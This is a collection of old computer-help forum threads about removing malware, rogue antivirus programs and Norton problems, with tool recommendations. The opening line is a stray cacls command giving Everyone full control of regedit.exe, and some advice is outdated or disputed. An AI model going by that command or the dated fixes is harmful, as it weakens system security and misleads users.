cacls "%systemroot%\regedit.exe" /e /g everyone:f
and the programs will be OK
Discussion
3281.

Solve : Need help, Norton 360 messed up?

Answer»

My Norton 360, which I am growing to hate more by the day, has somehow detected and "fixed" 2500 "risks" on my hard drive during a full scan. After this I now am unable to play certain games without my PC Freezing and restarting, or just plain freezing.

I have checked and system recovery and system restore are not working, and sadly my backup disks are missing. Friends have suggested reformating harddrive and THEN reinstall OS, but as you can see this this part of the problem. I just want to be able to play my games again and not have Norton screw me over yet again.

Here is some of my PC Specs via direct X diagnostic (dxdiag.exe)

OS: Windows XP Home Edition (service pack2)
Processor: Intel Pentium 4 CPU 3.06Ghz
Memory: 1536 RAM
Video Card: Nividia GeForce 6600 GT 128mb
DirectX Version: 9.0c

I have run Disk Defrag and Error check, installed FREE AVG software and scanned, nothing has helped yet. Plz help meIt's possible that perhaps important files were infected and removed, thus causing problems with your games. Does Norton have a list of all of the risks it cleaned? I haven't used Norton in years, but I'm sure it must have some sort of virus vault. This may prove to be helpful.

Although I wouldn't advise doing so just yet, if/when you want to remove Norton, we have a helpful guide.

Do you have a genuine Windows CD? If so, then perhaps you can TRY going to Start > Run and then type in sfc /scannnow (note the space) and hit Enter. This will require the Windows CD.

Also, be sure to update your video card drivers.Ok well windows CD is a no go unless it is decided to magically dissapear on me or NEVER came with the HP PC I got from Bestbuy over 3 years ago. If norton vaulted them how would i locate them? I have no been able to find them thus far.I have ordered recovery disks from HP, hopefully this iwll solve my issues, I will let you all know thenI'm not exactly sure where you might find it, but you can try Tools > Quarantine. I know older versions of Norton used to have that. Just check everywhere for mention of a Vault or Quarantine and see if you can get a list.Due to lack of feedback, I am CLOSING this topic. If you are the original poster and you would like this topic to be re-opened for any reason, PM me or another moderator and it can be arranged.

If you are not the original poster and you require help, please start a New Topic with information about your computer and your problem.
Discussion
3282.

Solve : results after scans with 6 programs?

Answer»

Its not nice but my pc has PICKED up 50 odd VIRUS's

As we speak still scanning for them but heres a little screenshot from super anti spyware.50 spywares would be more common than 50 different virii.

You might be ahead to just reinstall everything to start fresh. Do you have a real Windows CD, if needed?Sorry ... can't see any screenshot.

However, superanitapyware is excellent. It should help clear out much of the malware.

What program is telling you that the computer 50 viruses?

If you are still having trouble download a self-extracting copy of HijackThis from here …….

http://downloads.malwareremoval.com/hijackthis_sfx.exe

Save it to your Desktop.

Double-click on the file hijackthis_sfx.exe file and it will self-extract into its own folder ……

C:\Program Files\HijackThis

Go to this folder and RUN the hijackthis.exe file.

From the menu click on "Do a system scan and save a logfile".

Copy and paste both the HJT logfile to this thread. More specific removal instructions will follow.

[EDIT > or you can do as the Man says above]


OJAnd i forgot(in the other post):
How AVG's do you have?
What did other AVG's results say?

what other programs do you have?? look at my signature Quote from: GX1_Man on May 17, 2007, 02:33:42 AM

50 spywares would be more common than 50 different virii.

You might be ahead to just reinstall everything to start fresh. Do you have a real Windows CD, if needed?
GX is right!
All those threads may cant be cured
Reformat your system drive
Or better ALL OF YOUR DRIVES
Discussion
3283.

Solve : rundll32.exe_tobedeleted?

Answer»

Got sme spyware, whatever, I was running through my System32 files as I noticed some odd file next to rundll32.exe, it was called rundll32.exe_tobedeleted and it realy SCARES the living crap out of me.
What's this odd thing? What will happen if I touch it? Will it delete the real rundll32.exe or what? What if I deleted it?what programs did you use to scan your computer??


upload the file to virustotal

and post the logDKsupern00b ...... You recently had a trojan on that pc didnt you ?
did anyone help you to remove it ?
Please let us know.

dl65 Got it scanned but apparently it got stopped during the scan, this was what I got out of it though:

AhnLab-V32007.5.9.005.09.2007no virus found
AntiVir7.4.0.3206.14.2007no virus found
Authentium4.93.806.14.2007no virus found
Avast4.7.997.006.13.2007no virus found
AVG7.5.0.46705.08.2007no virus found
BitDefender7.206.14.2007no virus found
CAT-QuickHeal9.0006.14.2007no virus found
ClamAVdevel-2007041605.09.2007no virus found
DrWeb4.3306.14.2007no virus found
eSafe7.0.15.005.08.2007no virus found
eTrust-Vet30.7.371806.14.2007no virus found
FileAdvisor106.14.2007No threat detected
Fortinet2.85.0.006.14.2007no virus found
F-Prot4.3.2.4805.08.2007no virus found
F-Secure6.70.13030.005.09.2007no virus found
IkarusT3.1.1.705.09.2007no virus found
Kaspersky4.0.2.2406.14.2007no virus found
McAfee505306.14.2007no virus found
Microsoft1.250306.14.2007no virus found
NOD32v2232906.14.2007no virus found
Norman5.80.0206.14.2007no virus found
Panda9.0.0.406.14.2007no virus found

Aditional Information
File size: 33280 bytes
MD5: 5763e6224286473b771b234476c6538c
SHA1: 423c80fb7bd2f00cff87889d6599f2ba43ca2a0 9
Bit9 info: http://fileadvisor.bit9.com/services/extinfo.aspx?md5=5763e6224286473b771b234476c6538c

Are theese results sufficient?

Also yes I did get alot of Trojans, however I assume they have all been removed, currently I'm just trying to replace files that have been damaged and remove files the trojans might have left behind.

I'm using a-squared to scan for Viruses, just updated it a few hours to. Also just scanned and took down whatever spyware I might've had with Ad-Aware 2007 just updated and Spybot Search and Destroy.

Also for some reason I cannot enter my Internet Options, it gives me an error message stating I can't enter them because I have insufficient permissions and tells me to contact the System Administartor, but I'm the Admin!

This is also why I said I only assumed them all to be gone, I'm suspecting 1 to be left.

Currently my Explorer.exe or at least what I believe is the problem is acting rather percular. At random occassions programs in my taskbar will blink as if it was just opened/updated or as if I just recieved a message through IM. I believe it is completely unrelated however, it's just another problem I'd like to make you guys aware of.

Also I'd like to add I keep getting an error message about wuauctl.exe I believe, can't remember, I'm not home atm, using a friend's computer. It tells me the program executed an error and has to END. I know it's related to Windows Update.

Third problem I'd like to add, the final virus/trojan I haven't been able to kill because I weren't able to enter my Internet Options, a rather poor attempt from another program trying to convince me into thinking it's an anti-virus device of sorts, however that is fairly unbelievable, especially with a name like "Ultimate Defender", simply sounds too generic or simplistic for me to believe in it, I keep EXITING the program but everytime I get the wuauctl.exe this fake anti-virus thing tries to run again and I exit it.

The last and 5th problem (in total) is that I keep getting messages from Internet Explorer telling me it is redirecting to a new site even though IE is not active, I noticed however the top of a window on my screen with the following URL on it:
http://www.directporta.info/drivecleaner/8/
This is why I wanted to enter my Internet Options so I could set this page as one of the untrusted and keep my IE from entering it by blocking it somehow if that is even possible.

I'm aware I'm requesting a WHOLE lotta help here, I must also apologize for the awkward explanations I give things, but thanks in advance, even if we don't get it fixed. get superantispyware update it and scan in safe mode.. you got a browser hijack, thats why you get redirected.. can you upload a screenshot of the baloon you get about the fake prgram..Can't take a screenshot but here's a pic from Google: http://www.newfreedownloads.com/imgs/12636-w400.jpg

Mine looks like that, however before it goes into action it asks me first lol, that's where quit it. My biggest concern is that I don't know how to make it stop.

How do I fend off a browser hijack, and is it even possible to do so? Also would it help to uninstall and reinstall IE?
I also got Opera and Firefox installed just in case one or another dies.Ultimate Defender is listed as a rogue spyware app....get rid of it.As I said in some of my earlyer posts Patio,
I know it is some evil stash,
I know I have to remove it,
however as I also said I have no idea HOW to remove it.

Btw theese wuauctl.exe error messages are really appearing ALOT now.Have you attempted to remove it in safe mode with system restore turned off ? ?

I would re-run all your scans this way as well...DK, scan with HijackThis and post a LOG for us to look at.

rundll32.exe_tobedeleted is likely left over from a virus removal program, but there's definitely still something up with your computer.

I'm moving this thread to Viruses/Spyware section.I can't remove Ultimate Defender because I can't locate it's .exe file, if I knew where it is I could've killed it easily, however the .exe file is probably named something totally unrelated in order to protect itself.

Also would it help to uninstall and reinstall IE to fend off the browser hijack?Quote

Also would it help to uninstall and reinstall IE to fend off the browser hijack?

AFTER you get everything cleaned up, get spybot s&d, update it, then use the immunize function.how did you try to locate UD?? my computer> hhd> program files> UD folder

or

add/remove programs??

try

Ccleaners tools function its under the issues part Ok guys, really serious busniess this time.

I brought my Hard Disk to work and scanned it with their virus scanner, it deleted some viruses stored in system32,
when I got home and set the Hard Disk back in my computer and started it it went haywire in Windows.
It told me a file named drvfeg.dll was missing, now I checked on Google and stuff which gave no search results. But I'm not sure if it was called drvfeg.dll, however alot of the things that were supposed to run in my taskmanager under processes were missing. In the beginning the Task Bar was visible but only in Classic Windows skin, and after a few reboots it only showed half of the Task Bar with no icons in it.

I can't continue until this problem has been resolved, please tell me there is a way t fix it so we can go on.You have SmitFraud...at the very least. That dll is part of the infection.

Is your Taskbar the only thing affected by this missing dll? Are you still able to boot into Windows at all? If so, please download SmitfraudFix (by S!Ri) to your Desktop.

Double-click SmitfraudFix.exe
Select option #1 - Search by typing 1 and press "Enter"; a text file will appear, which lists infected files (if present).
Please copy/paste the content of that report into your next reply.

**If the tool fails to launch from the Desktop, please move SmitfraudFix.exe directly to the root of the system drive (USUALLY C:), and launch from there.

Note : process.exe is detected by some antivirus programs (AntiVir, Dr.Web, Kaspersky) as a "RiskTool"; it is not a virus, but a program used to stop system processes. Antivirus programs cannot distinguish between "good" and "malicious" use of such programs, therefore they may alert the user.
http://www.beyondlogic.org/consulting/proc...processutil.htm




Along with that, I would also like a HijackThis log. Also...I would advise against hooking up your hard drive at work. If you're not careful, you can spred the infection.
Discussion
3284.

Solve : Correction for Ruthie B.?

Answer»

I asked for help on PPCTL componet &AMP; I have XL NOT WINDOWS 2000
Discussion
3285.

Solve : Help with anti-virus.?

Answer»

I am buying a new computer and I was thinking about getting Norton but I heard that it takes up to much memory. I was wondering if there is a really good anti-virus that doesn't take up to much memory and GETS the job down. Other than AVG.. My hero!AVG is amazing.
And free.
Use that.
At least, that's my advice.Ok. it's just i don't know about the norton situation. Do you agree with me that it makes your computer slower. The plus side of it, is that I get it for free with my internet. Plus the firewall anti-spyware Etc...Yeah, ditch Norton.
Go with AVG and a different firewall (I recommend Comodo but I've heard good things about Sunbelt, Kerio(same thing? Not sure) and Jetico.
They're free and won't slow your PC down as much as Norton, plus can GIVE better protection.THANKS.I'd go with CALUM's advice. Even if you can get Norton for free, I still wouldn't use it. Its protection is often subpar and yes, it does take up a lot of resources on some machines. Most PEOPLE who switch from Norton to AVG notice a huge difference.

Quote from: Calum on June 10, 2007, 02:35:56 PM

I've heard good things about Sunbelt, Kerio(same thing? Not sure)
Sunbelt makes Kerio, so yeah, they're basically the same thing.Quote from: CBMatt on June 10, 2007, 06:43:19 PM
Quote from: Calum on June 10, 2007, 02:35:56 PM
I've heard good things about Sunbelt, Kerio(same thing? Not sure)
Sunbelt makes Kerio, so yeah, they're basically the same thing.
I thought so but I wasn't sure, thanks for clarifying.Agreed on the Norton thing. It's a resource hog and sometimes a little inefficient.

Some choices for free protection with links .....

Free AV.....

AVG > http://free.grisoft.com/doc/1

Avast > http://www.avast.com/eng/avast_4_home.html

Antivir > http://www.free-av.com/antivirus/allinonen.html

**Comodo > http://www.antivirus.comodo.com/ [AV in beta only as at 13.5.07]

AntidoteLite >
http://www.vintage-solutions.com/English/Antivirus/Super/index.html

Clamwin > http://www.clamwin.com/



Free F/W …..

Zone Alarm > http://www.zonelabs.com/store/content/catalog/products/sku_list_za.jsp?dc=12bms&ctry=US&lang=en&lid=nav_za

Sygate > http://www.simtel.net/product.download.mirrors.php?id=53687

Sunbelt Firewall (formerly Kerio) > http://www.sunbelt-software.com/Home-Home-Office/Sunbelt-Personal-Firewall/

**Comodo > http://www.comodo.com/products/free_products.html

Jetico > http://www.jetico.com/index.htm#/jpfirewall.htm

m0n0wall > http://m0n0.ch/wall/
(I’ve heard good things about monowall but it takes some setting up, I believe)

Smoothwall > http://www.smoothwall.org/

Tiny Personal > http://www.webmasterfree.com/tpfw.html

Outpost > http://www.agnitum.com/products/outpostfree/download.php



OJ
Discussion
3286.

Solve : Dell E-Mail Spoof?

Answer»

Quote

Websense Security LABS has received reports of a new email campaign starting in Australia that attempts to lure users to connecting to a malicious website. The Australia CERT has reported emails that are spoofing the Dell online store. The emails claim that the user is being charged for a CAMERA purchase and requests they connect to a SITE in order to view their profile. The site is encoding there code via Java Script which decodes to 8 different IFRAMES, all which attempt to load exploit code and download and install new malicious code...

Article1. Use FIREFOX
2. Use Noscript
3. Use Firefox with Noscript

(DUH!) lol
Discussion
3287.

Solve : What are the different ways??

Answer»

Im in a bit of a weird situation and I need to know the different ways that would be POSSIBLE to hack into a nexopia account. There is this girl who is threatining me and my friend. She is telling my friend that she will hack into mu nexopia account and delete it. She prooved she can CAUSE she hacked into his account and left him a msg. She doesnt even know him and he diidnt give anything away about his password, how could she have and be doing this???

-Melissa-I'm not that familiar with nexopia (never heard of it, actually), but I'm guessing that it should probably keep your password information secure. Below are two possibilities:

Your hacker (how do you know it's a she?) could have simply guessed your friend's password if it was easy enough (i.e. password, 123, their NAME). Or maybe your hacker could've downloaded some password cracking program (there are some out there, if you look hard enough...).


If in doubt, just get your friend to change his password, and if the hacker still gets into the account, they probably have a program to do so (or maybe even a keylogger, which is dangerous...)Contact the site owners and change your account...

Suggest the same for your friend as well...I know its a girl because she was talking to me and she has about 500 pics of herself. So wouldnt it be kind of pointless to change our accounts or passwords or anything like that if she has one of these programs? And I thought that key loggers had to be manually put into the computer?If I were you...I'd simply change the password on your account using various alphanumeric characters....capital letters...numbers...

This will MAKE it extremely difficult for someone to access your account simply by trying to guess your password. Keyloggers only work if your computer is infected with one.

Play it safe...update your operating system...your malware protection...your firewall...and stay on top of these things.

Another thing...never...evr open any email from someone you don't know...even if you do know who it is...are you expecting an email from them? Any attachments to your email that just don't sem right? Most importantly...if you use an email program like Outlook Express, Outlook, etc., etc....never use the Preview Pane feature.

Better safe than sorry.But how can someone infect your computer with a key logger? And better yet how do you get rid of the key logger?Quote

And I thought that key loggers had to be manually put into the computer?
Quote
But how can someone infect your computer with a key logger?
Just visiting a site or even connecting to the internet with INSUFFICIENT protection can get you infected.
Quote
And better yet how do you get rid of the key logger?
With decent protection.
Check the security FAQ section for more details.

Oh, and - that's not hacking.K perfect guys, thanks for your help:)

-Melissa-You're welcome, Melissa.
Discussion
3288.

Solve : Help please, my computer is acting funny?

Answer»

Game.exe(the file that REPRESENTS Diablo, Starcraft, or Warcraft) has the highest useage when I'm in a game and the lagging occurs. However, if I'm in the channel, the useage goes down to about 5k or so, yet I still have the lag spikes occuring while in the channel.OK.

Does a look at TASK Manager or Process Explorer help pinpoint any other process(es) that may be adding to lag?


OJboth MSN Messenger and AIM take 20k+(aim 20 or so, msn 30 or so)
those are really the only ones that take up large amounts of space.

However, I have PLAYED without either of those running and still ENCOUNTERED lag spikes.

**EDIT** Cleaning it with a can of compressed air worked. Thanks guys. **/EDIT**
Discussion
3289.

Solve : Error mesege " Error Creating Key."?

Answer»

Hi,
running Windows XP, Service Pack1, installed Anivirus-Ashampoo. while the user logon i am getiing the mesege "Error Creating Key.only the problem in user logon not in Adminstrator Logon.

help me,


sneha

[cleaning up - attachment DELETED by admin]Why don't you have Service Pack 2?

Did this problem happen before or after you installed Ashampoo?

How LONG has this been happening? Have you tried System Restore?Hi,

how to go to sytemrestore? i have to tacke any backup befor give system restore?the poblem was started only after created users.i tried SP2 also , again the same problem.the dialog box is comming continusly in the desktop.

Sneha
To use System Restore, navigate to...

Start > Programs > Accessories > System Tools > System Restore

Choose "Restore my computer to an earlier time" and click on Next. Then choose a date from before this problem started. And no, you don't have to backup your file. You may, however, have to reinstall any programs that were installed after that date. If System Restore doesn't fix your problem, you can undo the process.


Did you try deleting the user accounts you created?Respected Sir,
I tried systemrestore in Xp ,but i am getting the same errror,and i am getting the same error on windows 2000&2003 . there is no option in user logon systemrestore.

i never tried to delete the user account


Sneha
You have three operating systems loaded on this computer? MAYBE I'm WRONG, but perhaps that could possibly create a conflict.

Because this started when you created a user account, perhaps you should try deleting the account and see what happens.the three OS are in different mechinesYou're having this problem on three different computers? Or are you referring to System Restore? Keep in mind that 2000 and 2003 don't have the System Restore feature.


Have you tried deleting the account yet?Why don't we do ONE machine at a time. Pick one and give us a LOT of information about it.OS NameMicrosoft(R) Windows(R) Server 2003, Enterprise Edition
Version5.2.3790 Service Pack 1 BUILD 3790
System ManufacturerINTEL_
System ModelD845GVS1

Ashampoo Antivirus installed . But the problem was started after creating User,and the error mesege is comming only on userlogon.


sneha
Discussion
3290.

Solve : A virus??

Answer»

I'm running Windows XP and Internet Explorer browser. for some reason (unknown), i have been getting the BSoD aloBSOD came up again, as i was SAYING, the BSoD (blue screen of death) has been coming up with along the lines of STOP: 00x00000007b. i have norton 2007 and have been running regularly.

reply witha any ideas as to why this happening.

thxInaccessable boot device or a virus...those are the 2 choices from the Mothership.

What protection do you have ? ?Quote

i have norton 2007 and have been running system checks regularly.
Do you have a defrag utility running in background or scheduled to run while you are USING the computer?Quote from: ms_dos_sux on June 02, 2007, 09:51:53 AM
Quote
i have norton 2007 and have been running system checks regularly.
I'd say it's a stretch to CALL that protection. Have you TRIED scanning with any other programs?Quote from: CBMatt on June 02, 2007, 01:30:16 PM
Quote from: ms_dos_sux on June 02, 2007, 09:51:53 AM
Quote
i have norton 2007 and have been running system checks regularly.
I'd say it's a stretch to call that protection. Have you tried scanning with any other programs?

They must just Love us over at Symantec....Heh, I have no doubt that someone from the company is over here spying on us.Quote from: CBMatt on June 02, 2007, 01:51:52 PM
Heh, I have no doubt that someone from the company is over here spying on us.

I think it's Zylstra....


Due to lack of feedback, I am closing this topic. If you are the original poster and you would like this topic to be re-opened for any reason, PM me or another moderator and it can be arranged.

If you are not the original poster and you require help, please start a New Topic with information about your computer and your PROBLEM.
Discussion
3291.

Solve : Is RavMonE.exe a virus??

Answer»

Quote from: Ledio on May 18, 2007, 01:44:48 PM

very USEFUL, but it has not attracting GUI

Many useful tools do not...

FDisk
MBRWiz
Ghost
ProComm

Ugliest i've seen but they work.As this issue appears to be resolved, I am closing this topic. If you are the original POSTER and you would LIKE this topic to be re-opened for any reason, PM me or another moderator and it can be arranged.

If you are not the original poster and you require help, please start a New Topic with INFORMATION about your computer and your problem.
Discussion
3292.

Solve : Problem with keyboard?

Answer» DUE to LACK of feedback, I am closing this topic. If you are the ORIGINAL poster and you would like this topic to be re-opened for any reason, PM me or another moderator and it can be arranged.

If you are not the original poster and you require HELP, please start a New Topic with information about your computer and your PROBLEM.
Discussion
3293.

Solve : Virus/Spyware Problem..?

Answer»

I scanned for everything and deleted everything that it said was wrong, but my computer runs really slow and it sends out tons of emails and I have no clue to who.Click hereIn summary...we need more information.

What's your OS?
What protection do you have?
How many RUNNING processes? Any with high mem usage?
How long has this been happening?
HijackThis log?
What infections were deleted?

Basically, you need to tell US as much as you possibly can. Otherwise, we don't know anymore than you do.Due to LACK of feedback, I am closing this topic. If you are the original poster and you would like this topic to be re-opened for any reason, PM me or another moderator and it can be arranged.

If you are not the original poster and you require help, PLEASE start a NEW Topic with information about your computer and your problem.
Discussion
3294.

Solve : Can't delete this virus file!?

Answer»

And now Ledio has begun to hijack THREADS. Ledio is a newbie who can't organize his files nor REALIZE the IMPORTANCE of a secure browser/PC JUDGING from just one screenshot..

Due to lack of feedback, I am closing this topic. If you are the original poster and you would like this topic to be re-opened for any reason, PM me or another MODERATOR and it can be arranged.

If you are not the original poster and you require help, please start a New Topic with information about your computer and your problem.
Discussion
3295.

Solve : Tough virus infection?

Answer»

As this issue APPEARS to be RESOLVED, I am closing this topic. If you are the original poster and you WOULD like this topic to be re-opened for any reason, PM me or another moderator and it can be arranged.

If you are not the original poster and you require help, please start a New Topic with information about your computer and your problem.
Discussion
3296.

Solve : Help trojan virus w32myzor.fk@yf?

Answer»

Got a backdoor trojan, [emailprotected](i think). That got past a free edition of AVG i had installed on my pc. After knowing i had the trojan and AVG couldn't prevent it, I installed PC - Cillin which has not resolved the problem. The trojan keeps opening internet explorer with various different sites for spyware/malware removal, asking you to buy them. Also the trojan slows down my pc drastically almost to a freeze. It has contaminated windows media player. I have TRIED microsoft windows defender, adaware by lavasoft and spybot search + destroy which the trojan PREVENTS from even opening. Can anyone help?get norton 2007 w/ liveupdate. it should automatically put all known viruses and trojans into quarantine, and should remove it from all other infected programs.Travel <here> and follow the steps outlined in that guide.
Then post a HijackThis log for us to TAKE a look at, so we can advise you on any remaining problems.
Quote from: ms_dos_sux on June 01, 2007, 07:10:06 AM

get norton 2007 w/ liveupdate. it should automatically put all known viruses and trojans into quarantine, and should remove it from all other infected programs.
There is a REASON Norton is known as the Norton virus, and there is an entire FAQ article dedicated to its removal.
This advice is not the best, to say the least.
Please ignore it.Due to lack of feedback, I am closing this topic. If you are the original poster and you would like this topic to be re-opened for any reason, PM me or another moderator and it can be arranged.

If you are not the original poster and you require help, please start a New Topic with information about your computer and your problem.
Discussion
3297.

Solve : Unloading Norton with Symantics Un-Installer?

Answer»

It has taken me weeks to get to this point either from travel or sheer fear of following through with the Norton uninstall process. I have done it ...as of this afternoon I am free of Norton and I am a new man. The uninstall worked famously, it didn't touch Partition Magic (my biggest fear) and my computer is once again the flaming bolt it was before. I am using AVG now, no Ghost...Erunt is my backup method (although I have NEVER had to restore a system..Lucky), and I thank you all for your help. Especially Patio who I INSULTED by doubting his advise ("it is only advise") and may again. This forum is terrific for an old computer dude and you guys are super. THANKS and in the word of Arnold, "I will be back".Sorry for the running post but I needed to tell EVERYONE that a big video software conflict I have been having trouble with was solved by the Norton Uninstall. Now I can edit mpeg 2 files WITHOUT getting a Window Explorer error message. All those who may be having media problems may find a norton un-install the answer. I have been on the phone with Dell, SONIC, Sony and Roxio for more than a week only to discover Norton is the culprit. Norton Uninstall does un-install Ghost but it can be reinstalled, but does NOT touch Partition which most of you guys knew already. Sorry, sometimes we rookies have to learn the hard way, experience is the best teacher.As this issue appears to be resolved, I am closing this topic. If you are the original poster and you would like this topic to be re-opened for any reason, PM me or another moderator and it can be arranged.

If you are not the original poster and you require help, please start a New Topic with information about your computer and your problem.



EDIT: I'm glad to hear it all worked out, by the way, dhinds.
Discussion
3298.

Solve : PPCTL component?

Answer»

PPCTL component not correctly installed COMES up every 10 sec. on Windows 2000. Can anyone help me? Thanks.Much more information is needed to get an INTELLIGENT response. Keep it here, no need for another thread.

Ruthie B SAYS it is really XP, so we know that much.PPCTL is a component of Pest Patrol software.
Re-install it to get rid of the error message.
If you don't want to keep Pest Patrol remove it in Add/Remove Programs.Due to lack of feedback, I am closing this TOPIC. If you are the original POSTER and you would like this topic to be re-opened for any reason, PM me or another moderator and it can be arranged.

If you are not the original poster and you require help, please start a New Topic with information about your computer and your problem.
Discussion
3299.

Solve : I need to get my infected folders back to original state. Virus name: isass.exe?

Answer»

MeRK .... Is the work machine on a network ? If it is, can you isolate it from the network if necessary?

Please d/l ..... Stinger v3.4.9 from ..... http://vil.nai.com/vil/stinger/
I would suggest downloading it from a machine that is free of viruses and save it onto either a floppy disk or a cd.

Then from your work machine, d/l Spybot ........ http://www.spybot.info/en/
Once it is installed, get the latest updates........ Don't run it yet.

Now using the floppy disk or the cd (the one you d/l on a non infected machine) run it on your work machine and delete anything it finds (record what it found)

Next, run Spybot on your work machine and fix anything it finds (again record what was found)


Now then on to the hijack logfile..........

O2 - BHO: NoPhishing - {D3B071BE-7C15-43f6-8348-01EFC6092591} - C:\Progra~1\SoftRun\NoPhishing\NoPhishing.dll ...... Do you know if this is something that has been installed for sometime or is it something new ?

---------------------------------------------------------------------------------------------

016 ENTRIES....... Do you recognize these entries and know them to be ok ?
---------------------------------------------------------------------------------------------

O23 - Service: npkcsvc - INCA Internet Co., Ltd. - C:\WINDOWS\system32\npkcsvc.exe

This one looks nasty ...... and should be marked for removal using highjackthis.
npkcsvc.exe - npkcsvc - Process Information
Process File: npkcsvc.exe or npkcsvc
Process Name: Trojan-Downloader.Win32.Agent

Description:
npkcsvc.exe is a process which is registered as the Trojan-Downloader.Win32.Agent Trojan. This Trojan allows attackers to access your computer from remote locations, stealing passwords, Internet banking and personal data. This process is a security risk and should be removed from your system.

Sorry to be a little unsure re the removals, but most of the info I get is in Korean and when I translate it into english some of the meaning is lost in transltion.

Let us know the RESULTS of above.

DL65




will do thanks.And remove your internet cabledl65,

Whatever you do keep kool, please, . . .

I have a, (isass.exe), listed under processes in Task Manager.

Excepting it is spelled lsass.exe, does this mean I am infected ?

JpJp ... .lsass is the correct legit file. The other is not. Looks like you should be OK.

If you are having problems start your own new topic in this forum. Please do not piggy back on this thread.

***************

MeRK ... DAFT usually fixes file associations. No PROMISES but try it and report back.

Get it here ....

http://www.techsupportforum.com/sectools/Deckard/daft.exe

Download DAFT and save it to your desktop:

1. Double-click the daft.exe icon. Read the disclaimer and click OK.
2. Click on the Scan button.
3. Save a logfile. By default, it will save as daft.txt.

Post the resulting log here. If everything is in order again it should display the "all associations OK message".

Let us know what happens.

By the way if this is a work computer why isn't your IT manager fixing your problems? He's paid to do it. We're not.


OJOJ,

Thanks,

No this is not a work computer, . .But, . . .

Has CH tried excepting donations ? You'd probably be surprised at how thankful some people can be, . . I'm strapped for the time being, however,
I'd still shell-out waht I could, to know your ambitions and dreams wouldn't fade away in misery.

Yep, I'll tale a look at what you said and get back to you, . . .

JP
MeRK ........ I assumed you had tried this......
You can restore individual associations pretty easily from the Open With dialog box. To get there in Windows XP, right-click a file of the associated type and select Properties, click the Change button across from 'Opens with', and then, if necessary, choose Select the program from a list.

If you haven't tried this give it a try.
If that fails to help you, give the link "oddjob" supplied a go, his advice is usually sound. Please follow his instructions to the letter.

dl65
MeRK .... following on your PM to me, yes, you may have a file association problem that DAFT will fix. If not there's no problem running DAFT. If your file associations are all OK then DAFT won't cause problems.

All my own file associations are fine and I have run DAFT a couple of times without problems.

I still suggest you run DAFT on your machine and let us know what happens.

I am in touch with the program's developer and he is always interested in feedback, good or bad, as this is a fairly new program. Feedback helps him improve the program.


OJ

PS... thanks for the vote of confidence, dl65 To answer the first question of why my IT guy is not handling this.... there isn't one. I work for a lame *censored* computer illiterate %$#@%#$ boss who is a penny [emailprotected]#$##@[emailprotected]## who has no idea how anything works..he doesn't even have firewalls up, but thats besides the point. I currently work in South Korea and it seems like most smaller COMPANIES here just think viruses are a normal thing and not worry about it too much. Secondly.. I would love to try the daft thing or anything else that was posted from you guys (Much much much thanks by the way) but my co worker.. has just reformated everything, without telling me.... I Love where I work.. I swear if I wasn't making decent money..I would go back to the states right now. So much thanks guys. Now that I know this formum exsist, I will be back more often to learn more and maybe help where I can. Again much thanks.Quote from: MeRK on May 21, 2007, 04:43:29 PM

I will be back more often
I hope this doesn't mean you're expecting more trouble...!!

Best wishes.


OJAs this issue appears to be resolved, I am closing this topic. If you are the original poster and you would like this topic to be re-opened for any reason, PM me or another moderator and it can be arranged.

If you are not the original poster and you require help, please start a New Topic with information about your computer and your problem.
Discussion
3300.

Solve : strange file found by AVG 7.5, free edition,?

Answer»

Folks,

I have noticed that each time a COMPLETE test is done a file shows up in the scanning window, 'ntoskrnl.exe', under the Result/infection column, it says 'change' under Path column 'c:\WINDOWS\system32\ntoskrnl.ex
But the complete test result finally shows 'no threat found'.
I am using windows XP professional version. on an IBM netvista computer,

I posted the same qerry on the, AVG forumhttp://forum.grisoft.cz/freeforum/search.php?8

but NEVER received any reply hope someone will help out here.

regards
The_Saint
This was asked not too long AGO, but for the life of me, I can't find the thread for some reason. I must be tired. In any case, it's nothing to worry about. This is normal. This is just related to general maintenance, Windows Updates, or PERHAPS correcting a driver issue. You should only be concerned if AVG says the file is infected.Agreed. I get the same with AVG 7.5.

As soon as a scan starts, it lists

user32.dll (C:\Windows\System32\user32.dll)
shell32.dll (C:\Windows\System32\shell32.dll)
ntoskrnl.exe (C:\Windows\System32\ntoskrnl.exe)

It just means that updates have taken place.
like say you just updated your host files it would put host files there toAs this issue appears to be resolved, I am closing this topic. If you are the original poster and you would like this topic to be re-opened for any reason, PM me or another moderator and it can be arranged.

If you are not the original poster and you require help, please start a New Topic with information about your computer and your problem.
Discussion